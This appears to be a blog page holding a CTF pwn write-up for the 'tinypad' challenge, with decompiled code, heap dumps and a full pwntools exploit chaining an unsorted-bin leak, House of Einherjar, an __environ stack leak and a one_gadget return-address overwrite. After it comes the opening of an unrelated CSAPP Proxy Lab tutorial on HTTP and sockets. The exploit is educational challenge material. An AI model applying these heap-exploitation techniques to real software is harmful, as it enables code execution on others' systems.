      *(_QWORD *)&chunk_list[16 * index + 240] = 0LL;// only the size field is cleared; the freed pointer stays in the slot
      writeln((__int64)"\nDeleted.", 9LL);
    }
    else if ( choice > 'D' )
    {
      if ( choice != 'E' )
      {
        if ( choice == 'Q' )
          continue;
LABEL_41:
        writeln((__int64)"No such a command", 17LL);
        continue;
      }
      write_n((__int64)"(INDEX)>>> ", 0xBuLL);  // Edit memo         
      index = read_int();
      if ( index <= 0 || index > 4 )
        goto LABEL_29;
      if ( !*(_QWORD *)&chunk_list[16 * index + 240] )
        goto LABEL_31;
      c = 48;
      strcpy(chunk_list, *(const char **)&chunk_list[16 * index + 248]);// copy the memo into the scratch area at the start of chunk_list
      while ( toupper(c) != 'Y' )               // keep prompting until the user answers Y/y
      {
        write_n((__int64)"CONTENT: ", 9uLL);    // echoes the scratch buffer; a possible leak primitive
        len = strlen(chunk_list);
        writeln((__int64)chunk_list, len);
        write_n((__int64)"(CONTENT)>>> ", 0xDuLL);
        // The read length is the current strlen() of the memo itself, so an
        // empty target string means nothing can be read.
        len_data = strlen(*(const char **)&chunk_list[16 * index + 248]);
        read_until((__int64)chunk_list, len_data, 0xAu);
        writeln((__int64)"Is it OK?", 9LL);
        write_n((__int64)"(Y/n)>>> ", 9uLL);
        read_until((__int64)&c, 1uLL, 0xAu);
      }
      strcpy(*(char **)&chunk_list[16 * index + 248], chunk_list);// copy the edited text back into the memo
      writeln((__int64)"\nEdited.", 8LL);
    }
    else
    {
      if ( choice != 65 )                       // Add memo 
        goto LABEL_41;
      while ( index <= 3 && *(_QWORD *)&chunk_list[16 * index + 256] )// skip every slot whose size field is non-zero
        ++index;
      if ( index == 4 )
      {
        writeln((__int64)"No space is left.", 17LL);
      }
      else
      {
        size = -1;
        write_n((__int64)"(SIZE)>>> ", 0xAuLL);
        size = read_int();
        if ( size <= 0 )                        // non-positive sizes are replaced by 1
        {
          v5 = 1;
        }
        else
        {
          v5 = size;
          if ( (unsigned __int64)size > 0x100 ) // sizes above 0x100 are clamped to 0x100
            v5 = 256;
        }
        size = v5;
        *(_QWORD *)&chunk_list[16 * index + 256] = v5;
        *(_QWORD *)&chunk_list[16 * index + 264] = malloc(size);// allocate the memo buffer
        if ( !*(_QWORD *)&chunk_list[16 * index + 264] )
        {
          writerrln("[!] No memory is available.", 27LL);
          exit(-1);
        }
        write_n((__int64)"(CONTENT)>>> ", 0xDuLL);
        read_until(*(_QWORD *)&chunk_list[16 * index + 264], size, 0xAu);// read the memo content from the user
        writeln((__int64)"\nAdded.", 7LL);
      }
    }
  }
  while ( v12 != 81 );                          // 81 == 'Q': quit
  return 0;
}

代码量很大，而且很杂

入侵思路

这个程序的释放模块有很明显的漏洞：

free(*(void **)&chunk_list[16 * index + 248]);
*(_QWORD *)&chunk_list[16 * index + 240] = 0LL;

发现程序置空了 size ，却没有置空指针，可以打 unsortedbin leak

add(0xe0, "A"*0xe0)
add(0xf0, "B"*0xf0)
add(0x100, "C"*0x100)
add(0x100, "D"*0x100) # 因为后面"chunk4->size"会被覆盖低位,所以这里只能为0x100
delete(3) # 注意:这里要先释放后申请的chunk,不然程序不会打印(不知道原因)
delete(1)

pwndbg> x/20xg 0x19a4000 
0x19a4000:	0x0000000000000000	0x00000000000000f1 // chunk1(free)
0x19a4010:	0x00000000019a41f0	0x00007f763bf5db78
0x19a4020:	0x4141414141414141	0x4141414141414141
0x19a4030:	0x4141414141414141	0x4141414141414141
0x19a4040:	0x4141414141414141	0x4141414141414141
0x19a4050:	0x4141414141414141	0x4141414141414141
0x19a4060:	0x4141414141414141	0x4141414141414141
0x19a4070:	0x4141414141414141	0x4141414141414141
0x19a4080:	0x4141414141414141	0x4141414141414141
0x19a4090:	0x4141414141414141	0x4141414141414141
0x19a40a0:	0x4141414141414141	0x4141414141414141
0x19a40b0:	0x4141414141414141	0x4141414141414141
0x19a40c0:	0x4141414141414141	0x4141414141414141
0x19a40d0:	0x4141414141414141	0x4141414141414141
0x19a40e0:	0x4141414141414141	0x4141414141414141
0x19a40f0:	0x00000000000000f0	0x0000000000000100 // chunk2(allocated)
0x19a4100:	0x4242424242424242	0x4242424242424242
0x19a4110:	0x4242424242424242	0x4242424242424242
0x19a4120:	0x4242424242424242	0x4242424242424242
0x19a4130:	0x4242424242424242	0x4242424242424242
0x19a4140:	0x4242424242424242	0x4242424242424242
0x19a4150:	0x4242424242424242	0x4242424242424242
0x19a4160:	0x4242424242424242	0x4242424242424242
0x19a4170:	0x4242424242424242	0x4242424242424242
0x19a4180:	0x4242424242424242	0x4242424242424242
0x19a4190:	0x4242424242424242	0x4242424242424242
0x19a41a0:	0x4242424242424242	0x4242424242424242
0x19a41b0:	0x4242424242424242	0x4242424242424242
0x19a41c0:	0x4242424242424242	0x4242424242424242
0x19a41d0:	0x4242424242424242	0x4242424242424242
0x19a41e0:	0x4242424242424242	0x4242424242424242
0x19a41f0:	0x0000000000000000	0x0000000000000111 // chunk3(free)
0x19a4200:	0x00007f763bf5db78	0x00000000019a4000
0x19a4210:	0x4343434343434343	0x4343434343434343
0x19a4220:	0x4343434343434343	0x4343434343434343
0x19a4230:	0x4343434343434343	0x4343434343434343
0x19a4240:	0x4343434343434343	0x4343434343434343
0x19a4250:	0x4343434343434343	0x4343434343434343
0x19a4260:	0x4343434343434343	0x4343434343434343
0x19a4270:	0x4343434343434343	0x4343434343434343
0x19a4280:	0x4343434343434343	0x4343434343434343
0x19a4290:	0x4343434343434343	0x4343434343434343
0x19a42a0:	0x4343434343434343	0x4343434343434343
0x19a42b0:	0x4343434343434343	0x4343434343434343
0x19a42c0:	0x4343434343434343	0x4343434343434343
0x19a42d0:	0x4343434343434343	0x4343434343434343
0x19a42e0:	0x4343434343434343	0x4343434343434343
0x19a42f0:	0x4343434343434343	0x4343434343434343
0x19a4300:	0x0000000000000110	0x0000000000000110 // chunk4(allocated)
0x19a4310:	0x4444444444444444	0x4444444444444444
0x19a4320:	0x4444444444444444	0x4444444444444444
0x19a4330:	0x4444444444444444	0x4444444444444444
0x19a4340:	0x4444444444444444	0x4444444444444444
0x19a4350:	0x4444444444444444	0x4444444444444444
0x19a4360:	0x4444444444444444	0x4444444444444444
0x19a4370:	0x4444444444444444	0x4444444444444444
0x19a4380:	0x4444444444444444	0x4444444444444444
0x19a4390:	0x4444444444444444	0x4444444444444444
0x19a43a0:	0x4444444444444444	0x4444444444444444
0x19a43b0:	0x4444444444444444	0x4444444444444444
0x19a43c0:	0x4444444444444444	0x4444444444444444
0x19a43d0:	0x4444444444444444	0x4444444444444444
0x19a43e0:	0x4444444444444444	0x4444444444444444
0x19a43f0:	0x4444444444444444	0x4444444444444444
0x19a4400:	0x4444444444444444	0x4444444444444444
0x19a4410:	0x0000000000000000	0x0000000000020bf1

可以获取 libc_base 和 heap_addr 了：

p.recvuntil('NDEX: 3\n')
p.recvuntil('# CONTENT: ')
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

程序还有一个漏洞：

/*
 * Reads bytes one at a time from fd 0 into the buffer at a1 until `size` bytes
 * have been stored, read_n() reports end of input (0), or the byte just read
 * equals the delimiter `xa`. The buffer is then NUL-terminated at index i.
 *
 * Returns the index at which the terminator was written, or -1 if read_n()
 * fails.
 *
 * When the loop runs to completion i == size, so the terminator is stored at
 * a1[size], one byte past a buffer of `size` bytes (off-by-null).
 */
unsigned __int64 __fastcall read_until(__int64 a1, unsigned __int64 size, unsigned int xa)
{
  unsigned __int64 i; // [rsp+28h] [rbp-18h]
  signed __int64 n; // [rsp+30h] [rbp-10h]

  for ( i = 0LL; i < size; ++i )
  {
    n = read_n(0, (__int64 *)(a1 + i), 1uLL);
    if ( n < 0 )
      return -1LL;
    if ( !n || *(char *)(a1 + i) == xa )
      break;
  }
  *(_BYTE *)(a1 + i) = 0;					  // off-by-one: writes a1[size] when the buffer was filled completely
  if ( i == size && *(_BYTE *)(size - 1 + a1) != 10 )
    dummyinput(xa);                             // buffer filled without a trailing '\n'; dummyinput is not shown here, possibly another weak spot
  return i;
}

又是经典的置空末尾“\n”，造成了 off-by-null

有 off-by-null 可以置空下一个chunk的P位
修改模块可以控制 chunk_list 这一大片区域，伪造 fake_size 绰绰有余
最后一个chunk的“presize”直接作为相邻上一个chunk的数据区，完全可以控制

可以考虑打 House Of Einherjar 了：伪造“lastchunk-presize”，溢出“\x00”到“lastchunk->size”

chunk_list_addr=0x602040
chunk2_addr=heap_addr+0xf0
offset=chunk2_addr-chunk_list_addr 
# 和House Of Force不同，House Of Einherjar是利用"合并机制"向上合并topchunk
# 所以offset常常为正('减数'和'被减数'对调)
success('chunk_list_addr >> '+hex(chunk_list_addr))
success('chunk2_addr >> '+hex(chunk2_addr))
success('offset >> '+hex(offset))

add(0xe8, "g"*(0xe8-0x8) + p64(offset)) # 为了申请到chunk1,这里只能申请0xe8
delete(4) # 因为chunk3为free状态，释放chunk4会导致chunk3和chunk4进入topchunk，使chunk2成为“最后一个chunk”(来打House Of Einherjar)

pwndbg> x/20xg 0x1993000
0x1993000:	0x0000000000000000	0x00000000000000f1
0x1993010:	0x6767676767676767	0x6767676767676767
0x1993020:	0x6767676767676767	0x6767676767676767
0x1993030:	0x6767676767676767	0x6767676767676767
0x1993040:	0x6767676767676767	0x6767676767676767
0x1993050:	0x6767676767676767	0x6767676767676767
0x1993060:	0x6767676767676767	0x6767676767676767
0x1993070:	0x6767676767676767	0x6767676767676767
0x1993080:	0x6767676767676767	0x6767676767676767
0x1993090:	0x6767676767676767	0x6767676767676767
0x19930a0:	0x6767676767676767	0x6767676767676767
0x19930b0:	0x6767676767676767	0x6767676767676767
0x19930c0:	0x6767676767676767	0x6767676767676767
0x19930d0:	0x6767676767676767	0x6767676767676767
0x19930e0:	0x6767676767676767	0x6767676767676767
0x19930f0:	0x00000000013910b0	0x0000000000000100 // offset(0x19930f0-0x602040)

伪造 fakechunk -> presize，size，FD，BK，FD_next，BK_next ：

payload = p64(0x100) + p64(offset)
payload += p64(chunk_list_addr) * 4 # fakechunk为largechunk,会启用FDsize,BKsize
edit(2, payload)
delete(2)

pwndbg> x/20xg 0x602040
0x602040 <tinypad>:	0x0000000000000100	0x0000000000c710b0
0x602050 <tinypad+16>:	0x0000000000602040	0x0000000000602040
0x602060 <tinypad+32>:	0x0000000000602040	0x0000000000602040
0x602070 <tinypad+48>:	0x4242424242424200	0x4242424242424242
0x602080 <tinypad+64>:	0x4242424242424242	0x4242424242424242

下一个 chunk 就会申请到“0x602040”，以后的区域都是可以控制的，刚好可以控制 chunk1（即使不能控制 chunk1 也可以多次申请，直到控制 chunkn 为止）

接下来有两种主流打法：

劫持 GOT
劫持 hook

因为程序开了 Full RELRO ，GOT不可写，所以不能GOT劫持

我当时打 hook 的时候发现“修改模块”始终复制不上字符串，最后发现原因了：

len_data = strlen(*(const char **)&chunk_list[16 * index + 248]);
read_until((__int64)chunk_list, len_data, 0xAu);

“chunk_list[16 * index + 248]” 中是真实存在数据的，所以 len_data 有值

但是把这里覆盖为 __free_hook 的地址后，由于 __free_hook 处的内容初始为 0，strlen 返回 0，len_data 就变为“0”了，导致 read_until 读不了数据

遇到这个问题，网上有两种解决办法：

通过全局变量 __environ 泄露栈地址，把 one_gadget 的地址写到返回地址上
在 malloc_hook 前面寻找有数据的地址，利用它们来欺骗 strlen

这里采用第一种方法（第二种方法还没有研究明白）

在 libc 中有一个全局变量__environ，储存着该程序环境变量的地址，而环境变量是储存在栈上的，所以可以泄露栈地址，所以可以控制rip了

payload = p64(0xe8) + p64(libc_base + libc.symbols["__environ"])
payload += p64(0xe8) + p64(0x602148)
add(0xe0, "t"*0xe0)
add(0x100, payload)

p.readuntil("# CONTENT: ")
stack = p.read(6).ljust(8,'\x00')
stack_env = u64(stack)
success("env_stack address: " + hex(stack_env))

1	[+] env_stack address: 0x7ffe177c5a98

在 GDB 中查看 main 的返回地址：

pwndbg> stack 50
00:0000│ rsp   0x7ffe177c58b8 —▸ 0x400ed9 (_read_n+112) ◂— mov    qword ptr [rbp - 0x10], rax
01:0008│       0x7ffe177c58c0 ◂— 0x4
02:0010│       0x7ffe177c58c8 ◂— 0x1
03:0018│       0x7ffe177c58d0 —▸ 0x7ffe177c5964 ◂— 0x338cf40000000000
04:0020│       0x7ffe177c58d8 —▸ 0x400fad (_write_n+112) ◂— mov    qword ptr [rbp - 0x10], rax
05:0028│       0x7ffe177c58e0 —▸ 0x401a29 ◂— or     al, byte ptr [rax] /* '\n' */
06:0030│       0x7ffe177c58e8 ◂— 0x0
07:0038│       0x7ffe177c58f0 —▸ 0x4018d8 (prompt_cmd) ◂— sub    byte ptr [rbx + 0x4d], al /* '(CMD)>>> ' */
08:0040│       0x7ffe177c58f8 ◂— 0x2695b83a338cf400
09:0048│ rbp   0x7ffe177c5900 —▸ 0x7ffe177c5950 —▸ 0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— ...
0a:0050│       0x7ffe177c5908 —▸ 0x401100 (read_until+73) ◂— mov    qword ptr [rbp - 0x10], rax
0b:0058│       0x7ffe177c5910 ◂— 9 /* '\t' */
0c:0060│       0x7ffe177c5918 ◂— 0xa338cf400
0d:0068│       0x7ffe177c5920 ◂— 0x1
0e:0070│       0x7ffe177c5928 —▸ 0x7ffe177c5964 ◂— 0x338cf40000000000
0f:0078│       0x7ffe177c5930 ◂— 9 /* '\t' */
10:0080│       0x7ffe177c5938 ◂— 0x0
11:0088│       0x7ffe177c5940 —▸ 0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
12:0090│       0x7ffe177c5948 ◂— 0x2695b83a338cf400
13:0098│       0x7ffe177c5950 —▸ 0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
14:00a0│       0x7ffe177c5958 —▸ 0x400832 (getcmd+92) ◂— mov    esi, 1
15:00a8│ rsi-4 0x7ffe177c5960 ◂— 0x2
16:00b0│       0x7ffe177c5968 ◂— 0x2695b83a338cf400
17:00b8│       0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
18:00c0│       0x7ffe177c5978 —▸ 0x4009c1 (main+350) ◂— mov    dword ptr [rbp - 0x10], eax
19:00c8│       0x7ffe177c5980 ◂— 0x3400401370
1a:00d0│       0x7ffe177c5988 ◂— 0x4
1b:00d8│       0x7ffe177c5990 ◂— 0x10000000041 /* 'A' */
1c:00e0│       0x7ffe177c5998 ◂— 0x2695b83a338cf400
1d:00e8│       0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
1e:00f0│       0x7ffe177c59a8 —▸ 0x7f6d91c1c840 (__libc_start_main+240) ◂— mov    edi, eax // target
1f:00f8│       0x7ffe177c59b0 ◂— 0x1

计算偏移：

In [6]: 0x7ffe177c59a8-0x7ffe177c5a98
Out[6]: -240

完整exp：

from pwn import*

p=process('./tinypad')
elf=ELF('./tinypad')
libc = ELF('./libc-2.23.so')

def add(size,content):
	"""Drive the 'Add memo' menu entry of the target process `p`.

	Waits for the command prompt, sends 'a', then answers the size prompt
	with `size` and the content prompt with `content` (each sent with a
	trailing newline by sendline).
	"""
	p.recvuntil('(CMD)>>> ')
	p.sendline('a')
	p.recvuntil('(SIZE)>>> ')
	p.sendline(str(size))
	p.recvuntil('(CONTENT)>>> ')
	p.sendline(content)

def delete(index):
	"""Drive the 'Delete memo' menu entry of the target process `p`.

	Waits for the command prompt, sends 'd', then answers the index prompt
	with `index` (the 1-based memo number shown by the program).
	"""
	p.recvuntil('(CMD)>>> ')
	p.sendline('d')
	p.recvuntil('(INDEX)>>> ')
	p.sendline(str(index))

def edit(index,content):
	"""Drive the 'Edit memo' menu entry of the target process `p`.

	Sends 'e' and the memo `index`, skips the echoed current content,
	submits `content` as the new text and confirms with 'y' so the program
	copies it back into the memo.
	"""
	p.recvuntil('(CMD)>>> ')
	p.sendline('e')
	p.recvuntil('(INDEX)>>> ')
	p.sendline(str(index))
	# The program first echoes the current text after "CONTENT: " and only
	# then shows the input prompt, so both markers are consumed in order.
	p.recvuntil('CONTENT: ')
	p.recvuntil('(CONTENT)>>> ')
	p.sendline(content)
	p.recvuntil('(Y/n)>>> ')
	p.sendline('y')

add(0xe0, "A"*0xe0)
add(0xf0, "B"*0xf0)
add(0x100, "C"*0x100)
add(0x100, "D"*0x100)
delete(3)
delete(1)

p.recvuntil('NDEX: 1\n')
p.recvuntil('# CONTENT: ')
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
heap_addr=leak_addr-0x1f0

p.recvuntil('NDEX: 3\n')
p.recvuntil('# CONTENT: ')
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('heap_addr >> '+hex(heap_addr))
success('libc_base >> '+hex(libc_base))

chunk_list_addr=0x602040
chunk2_addr=heap_addr+0xf0
offset=chunk2_addr-chunk_list_addr
success('chunk_list_addr >> '+hex(chunk_list_addr))
success('chunk2_addr >> '+hex(chunk2_addr))
success('offset >> '+hex(offset))

add(0xe8, "g"*(0xe8-0x8) + p64(offset))
delete(4)

payload = p64(0x100) + p64(offset)
payload += p64(chunk_list_addr)*4
edit(2, payload)
delete(2)

gadget = [0x45226,0x4527a,0xf03a4,0xf1247]
gadget_addr = libc_base + gadget[3]
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook >> '+hex(malloc_hook))

payload = p64(0xe8) + p64(libc_base + libc.symbols["__environ"])
payload += p64(0xe8) + p64(0x602148)
add(0xe0, "t"*0xe0)
add(0x100, payload)

p.readuntil("# CONTENT: ")
stack = p.read(6).ljust(8,'\x00')
stack_env = u64(stack)
success("env_stack address: " + hex(stack_env))
pause()
edit(2, p64(stack_env-240))
edit(1, p64(gadget_addr))
p.readuntil("(CMD)>>>")
p.sendline("Q")

p.interactive()

house of einherjar 小结（2.23-64位）

house of Einherjar 的核心在于 top chunk 合并，如果一个程序有 off-by-null，并且某片区域可以控制，那么就可以通过 house of einherjar 把 top chunk 合并到那里去

特点归纳如下：

需要 off-by-one 漏洞（用于覆盖 last chunk->size 的P位为“0”）
需要一片可以控制的区域（用于伪造“fake chunk->presize，size，FD，BK，FDsize，BKsize”）

在决定打 house of einherjar 后，要多注意最后一个chunk，和倒数第二个chunk，有时可以通过释放后面的chunk，来把我们“布置”好的chunk变为 last chunk

对于本题目而言，libc-2.27版本是打不通的，因为绕过 tcache 需要释放7个chunk来填满对应的 tcache bin，但是本题目只允许同时存在 4 个chunk，所以测试不了 libc-2.27版本对 house of einherjar 的影响了

另外我还学到了一种泄露栈地址的技术：Environ Leak

CSapp-Proxy Lab

Posted on 2022-03-06 Edited on 2022-10-10 In Knowledge 52k 47 mins.

Proxy Lab

网络代理是一个在网络浏览器和终端服务器之间充当中间人的程序，而不是直接联系终端服务器以获取网页，浏览器会联系代理，代理会转发请求发送到终端服务器

当终端服务器回复代理时，代理将回复发送到浏览器

代理有很多用途：

有时在防火墙中使用代理，因此防火墙只能通过代理与防火墙之外的服务器联系
代理也可以充当匿名者：通过剥离所有标识信息的请求
代理可以使浏览器对Web匿名服务器
代理甚至可以通过存储来自服务器的对象的本地副本来缓存web对象，通过从缓存中读取请求来响应未来的请求，而不是通过再次与远程服务器

在本实验室中，您将编写一个简单的HTTP代理来缓存web对象，在实验室的第一部分，你将设置代理以接受传入连接、读取和分析请求、将请求转发到web服务器、读取服务器的响应，并将这些响应转发给相应的客户端

第一部分：您将学习基本的HTTP操作，以及如何使用套接字编写通信程序通过网络连接

第二部分：您将升级代理以处理多个并发事件连接，这将向您介绍如何处理并发性，这是一个至关重要的系统概念

第三部分：您将使用一个简单的最近访问的内存缓存向代理添加缓存网络内容

实验文件

proxy.c：启动代理服务器的代码写在此处
tiny：Tiny web服务器的源代码
driver.sh：打分文件

在开始实验前，需要一些储备知识：

服务器简析

每个网络应用都是基于客户端—服务器模型的，釆用这个模型，一个应用是由 一个服务器进程 和一个或者多个 客户端 进程组成

一个客户端—服务器事务由以下四步组成：

当一个客户端需要服务时，它向服务器发送一个请求，发起一个事务，例如，当 Web 浏览器需要一个文件时，它就发送一个请求给 Web 服务器
服务器收到请求后，解释它，并以适当的方式操作它的资源，例如，当 Web 服务器收到浏览器发出的请求后，它就读一个磁盘文件
服务器给客户端发送一个响应，并等待下一个请求，例如，Web 服务器将文件发送回客户端
客户端收到响应并处理它，例如，当 Web 浏览器收到来自服务器的一页后，就在屏幕上显示此页

服务器请求

一般的请求消息如下代码所示：

GET /home.html HTTP/1.0 <!-- 请求消息行 -->
Accept: */* <!-- 请求消息头 -->
Host: localhost:<port>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3
Connection: close
Proxy-Connection: close
    
<html> <!-- 消息正文 -->
<head><title>test</title></head>
<body> 
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>

请求消息行：请求消息的第一行为请求消息行
- 例如：GET /test/test.html HTTP/1.1
- GET 为请求方式，请求方式分为：Get（默认）、POST、DELETE、HEAD等
  - GET：参数附在 URL 中，明文可见，不适合传输敏感数据；URL 长度受浏览器和服务器限制，能携带的数据量有限
  - POST：参数放在消息正文中，不会出现在 URL 里，数据量基本不受限制（但若不使用 HTTPS，正文同样是明文传输）
- /test/test.html 为URI，统一资源标识符
- HTTP/1.1 为协议版本
请求消息头：从第二行开始到空白行统称为请求消息头
- Accept：浏览器可接受的MIME类型告诉服务器客户端能接收什么样类型的文件
- Accept-Charset：浏览器通过这个头告诉服务器，它支持哪种字符集
- Accept-Encoding：浏览器能够进行解码的数据编码方式，比如 gzip
- Accept-Language：浏览器所希望的语言种类，当服务器能够提供一种以上的语言版本时要用到，可以在浏览器中进行设置
- Host：初始URL中的主机和端口
- Referer：包含一个URL，用户从该URL代表的页面出发访问当前请求的页面（注意 HTTP 头部的拼写是 Referer）
- Content-Type：内容类型告诉服务器浏览器传输数据的MIME类型，文件传输的类型
- If-Modified-Since：利用这个头与服务器的文件进行比对，如果一致，则从缓存中直接读取文件
- User-Agent：浏览器类型
- Content-Length：表示请求消息正文的长度
- Connection：表示是否需要持久连接。如果服务器看到这里的值为“Keep-Alive”，或者看到请求使用的是HTTP 1.1（HTTP 1.1默认进行持久连接），它就可以在同一个连接上继续处理后续请求
- Cookie：用于分辨两个请求是否来自同一个浏览器，以及保存一些状态信息
- Date：请求时间GMT
消息正文：当请求方式是[POST]方式时，才能看见消息正文，消息正文就是要传输的一些数据，如果没有数据需要传输时，消息正文为空

服务器响应

一般的响应消息如下代码所示：

HTTP/1.0 200 OK <!-- 响应消息行 -->
Server: Tiny Web Server <!-- 响应消息头 -->
Content-length: 120
Content-type: text/html

<html> <!-- 响应正文 -->
<head><title>test</title></head>
<body> 
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>

响应消息行：第一行响应消息为响应消息行
- 例如：HTTP/1.0 200 OK
- HTTP/1.0 为协议版本
- 200 为响应状态码，常用的响应状态码有40余种，这里我们仅列出几种，详细请看：
  - 200：一切正常
  - 302/307：临时重定向
  - 304：未修改，客户端可以从缓存中读取数据，无需从服务器读取
  - 404：服务器上不存在客户端所请求的资源
  - 500：服务器内部错误
- OK 为状态码描述
响应消息头：
- Location：指示新的资源的位置通常和302/307一起使用，完成请求重定向
- Server：指示服务器的类型
- Content-Encoding：服务器发送的数据采用的编码类型
- Content-Length：告诉浏览器正文的长度
- Content-Language：服务发送的文本的语言
- Content-Type：服务器发送的内容的MIME类型
- Last-Modified：文件的最后修改时间
- Refresh：指示客户端刷新频率，单位是秒
- Content-Disposition：指示客户端下载文件
- Set-Cookie：服务器端发送的Cookie
- Expires：-1
- Cache-Control：no-cache (1.1)
- Pragma：no-cache (1.0) 表示告诉客户端不要使用缓存
- Connection：close/Keep-Alive
- Date：请求时间
响应正文：即网页的源代码（F12可查看）

网络编程结构体

通用结构体：struct sockaddr，16个字节

/* Generic socket address structure (for connect, bind, and accept) */
struct sockaddr {
    uint16_t   sa_family;      /* Protocol family */
    char       sa_data[14];    /* Address data */
};

struct sockaddr 是一个通用地址结构，这是为了统一地址结构的表示方法，统一接口函数，使不同的地址结构可以被bind() , connect() 等函数调用

sockaddr的缺陷：sa_data 把目标地址和端口信息混在一起了

通用结构体：struct sockaddr_storage，128个字节

/* Structure large enough to hold any socket address 
  (with the historical exception of AF_UNIX). 128 bytes reserved.  */
  
#if ULONG_MAX > 0xffffffff
# define __ss_aligntype __uint64_t
#else
# define __ss_aligntype __uint32_t
#endif
#define _SS_SIZE        128
#define _SS_PADSIZE     (_SS_SIZE - (2 * sizeof (__ss_aligntype)))
 
 struct sockaddr_storage
 {
     uint16_t          ss_family;     /* Address family */
     __ss_aligntype   __ss_align;     /* Force desired alignment.  */
     char __ss_padding[_SS_PADSIZE];
};

struct sockaddr_storage 被设计为同时适合 struct sockaddr_in 和 struct sockaddr_in6

为了避免试图知道要使用的IP版本，可以使用 struct sockaddr_storage，该版本可以保存其中任何一个，后将通过 connect()，bind() 等函数将其类型转换为 struct sockaddr 并以这种方式进行访问

IPv4：struct sockaddr_in，16个字节

/* IP socket address structure */
struct sockaddr_in {
    uint16_t       sin_family;   /* Protocol family (always AF_INET) */
    uint16_t       sin_port;     /* 16位的端口号 */
    struct in_addr sin_addr;     /* 32位的IP地址 */
    unsigned char sin_zero[sizeof (struct sockaddr) -
                           sizeof (sa_family_t) -
                           sizeof (in_port_t) -
                           sizeof (struct in_addr)]; // sin_zero[8]
    /* Pad to sizeof(struct sockaddr) */
};

typedef uint32_t in_addr_t;
struct in_addr  {
     in_addr_t   s_addr;            /* IPv4 address */
};

该结构体解决了 sockaddr 的缺陷，把 port 和 addr 分开储存在两个变量中

IPv6：struct sockaddr_in6，28个字节

struct sockaddr_in6 {
    uint16_t    sin6_family;      /* AF_INET6 */
    uint16_t    sin6_port;        /* Transport layer port # */
    uint32_t    sin6_flowinfo;    /* IPv6 flow information */
    struct in6_addr sin6_addr;    /* IPv6 address */
    uint32_t sin6_scope_id;       /* IPv6 scope-id */
};
struct in6_addr {
    union {
        uint8_t u6_addr8[16];
        uint16_t u6_addr16[8];
        uint32_t u6_addr32[4];
    } in6_u;

    #define s6_addr                 in6_u.u6_addr8
    #define s6_addr16               in6_u.u6_addr16
    #define s6_addr32               in6_u.u6_addr32
};

网络编程中的信号

进程组

进程组就是一系列相互关联的进程集合，系统中的每一个进程也必须从属于某一个进程组，每个进程组中都会有一个唯一的 ID(process group id)，简称 PGID，PGID 一般等同于进程组的创建进程的 Process ID，而这个进程一般也会被称为进程组先导(process group leader)，同一进程组中除了进程组先导外的其他进程都是其子进程

进程组的存在，方便了系统对多个相关进程执行某些统一的操作，例如：我们可以一次性发送一个信号给同一进程组中的所有进程

会话

会话（session）是一个若干进程组的集合，同样的，系统中每一个进程组也都必须从属于某一个会话

一个会话只拥有最多一个控制终端（也可以没有），该终端为会话中所有进程组中的进程所共用
一个会话中前台进程组只会有一个，只有其中的进程才可以和控制终端进行交互，除了前台进程组外的进程组，都是后台进程组

和进程组先导类似，会话中也有会话先导(session leader)的概念，用来表示建立起到控制终端连接的进程，在拥有控制终端的会话中，session leader 也被称为控制进程(controlling process)，一般来说控制进程也就是登入系统的 shell 进程(login shell)

带外数据

带外数据用于迅速告知对方本端发生的重要的事件，它比普通的数据（带内数据）拥有更高的优先级， 不论发送缓冲区中是否有排队等待发送的数据，它总是被立即发送 ，带外数据的传输可以使用一条独立的传输层连接，也可以映射到传输普通数据的连接中

// 实际应用中，带外数据很少使用，已知的使用者只有 telnet 和 ftp 等远程交互程序

UDP没有实现带外数据传输，TCP也没有真正的带外数据，不过TCP利用头部的紧急指针标志和紧急指针，为应用程序提供了一种紧急方式，含义和带外数据类似，TCP的紧急方式利用传输普通数据的连接来传输紧急数据

SIGHUP信号（关闭进程）

SIGHUP 信号在 用户终端连接(正常或非正常)结束 时发出, 通常是在终端的控制进程结束时, 通知同一session内的各个作业(任务)，这时它们与控制终端不再关联

系统对SIGHUP信号的默认处理是：终止收到该信号的进程 ，所以若程序中没有捕捉该信号，当收到该信号时，进程就会退出

SIGHUP会在以下3种情况下被发送给相应的进程：

终端关闭时，该信号被发送到 session 首进程以及作为 job 提交的进程（即用 & 符号提交的进程）
session 首进程退出时，该信号被发送到该 session 中的前台进程组中的每一个进程
若父进程退出导致进程组成为孤儿进程组，且该进程组中有进程处于停止状态（收到SIGSTOP或SIGTSTP信号），该信号会被发送到该进程组中的每一个进程

例如：在我们登录Linux时，系统会分配给登录用户一个终端(Session)，在这个终端运行的所有程序，包括前台进程组和后台进程组，一般都属于这个 Session，当用户退出Linux登录时，前台进程组和后台有对终端输出的进程将会收到SIGHUP信号，这个信号的默认操作为终止进程，因此前台进程组和后台有终端输出的进程就会中止

// 晦涩难懂，需要在实例中理解分析

SIGPIPE信号（告知中断）

当 往一个写端关闭的管道或 socket 连接中连续写入数据时会引发 SIGPIPE 信号（引发 SIGPIPE 信号的写操作将设置 errno 为EPIPE）

在TCP通信中，当通信的双方中的一方close一个连接时，若另一方接着发数据，根据TCP协议的规定，会收到一个RST(Reset the connection)响应报文，若再往这个服务器发送数据时，系统会发出一个SIGPIPE信号给进程，告诉进程这个连接已经断开了，不能再写入数据

即使断开还可以进行一次通信，第二次发送数据时才触发SIGPIPE
可以用相应的 handle 进行处理SIGPIPE，完成想要的操作

服务器代码：

/*
 * SIGPIPE handler: reports the received signal number on standard output as
 * "SIGPIPE : <n>\n".
 *
